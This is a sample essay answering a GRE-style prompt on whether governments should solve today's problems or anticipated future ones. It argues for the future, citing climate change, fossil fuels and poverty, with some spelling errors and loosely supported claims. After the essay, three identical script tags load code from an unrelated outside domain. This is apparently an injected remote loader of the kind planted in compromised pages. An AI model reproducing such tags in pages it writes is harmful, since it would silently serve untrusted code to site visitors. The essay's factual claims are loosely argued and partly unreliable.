Governments should focus on solving the immediate problems of today rather than on trying to solve the anticipated problems of the future.

Write a response in which you discuss the extent to which you agree or disagree with the recommendation and explain your reasoning for the position you take. In developing and supporting your position, describe specific circumstances in which adopting the recommendation would or would not be advantageous and explain how these examples shape your position.

Governments of several nations of the world strive hard on a daily basis to provide solutions for the problems the citizens of a country are facing. People are of the opinion that the governments should focus on solving the immediate problems of today rather than on trying to solve the anticipated problems of the future. The statement may prove to be true, if we roll back fifty years, when the world was not going through unprecedented problems like climate change, depleting natural resources and increasing poverty. Perhaps, for the current world scenario, it is ideal for the governments to find solutions for probable future problems and I support such a stance. I will explain the reasoning behind my position in the paragraphs below.

The world is going through undesirable changes when it comes to the overall climate. The temperatures of the world are rising and there is no solution currently to disuade the world temperatures from rising beyond the danger mark. Therefore, it is the responsibility of various governments of the world to look for a possible solution that might prevent global warming from becoming a world-ending event. Currently, global warming and climate change are only showing sporadic signs of existence, but if due attention is not paid towards this dangerous phenomena that is occuring. It could prove to be detrimental for human species. As a result, multinational companies like Amazon, Microsoft and Google have pledged towards going carbon-neutral in a few years. Such steps can be taken by government in advance to prevent a disaster from taking place.

Fossil fuels have been found in abundant quantities in various parts of the world. As a result, humans have paid no heed towards conserving these resources for the future generations. It is known that we humans are a selfish organism. We have grown so self-centered that we are exploiting fossil fuels as if we are the only ones that require it. Therefore, the world governments should look towards promoting alternative forms of energy, since that day would not be distant when we are left with no natural resources to consume. A long term plan has to be put in place. Like making policies so as to reduce the cost associated with investing in solar power, wind power and hydro power. These initiatives are necessary for the existence of human race in future. And the planning for such solutions should be started right away.

Lastly, the world today has many individuals who are below the poverty line. These people do not have the money to spend upon nutritious food items. As a result, the kids are born with deficiencies which cripple their normal functioning. It can be argued that these individuals can be provided food in the form donations, since poverty is a problem the world is facing right now. But donations are a short term solution. Therefore, allowing the governments to research upon new and cheaper ways to produce food would go about a long way in ascertaining the fact that poverty could be non-existent, fifty years down the line.

In sum, I am still a supporter of the claim that governments should concentrate upon trying to solve the anticipated problems of the future. This is because the world is in a volatile state and if necessary actions are not taken to secure the future. We may be left with no future to look forward at all.

<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>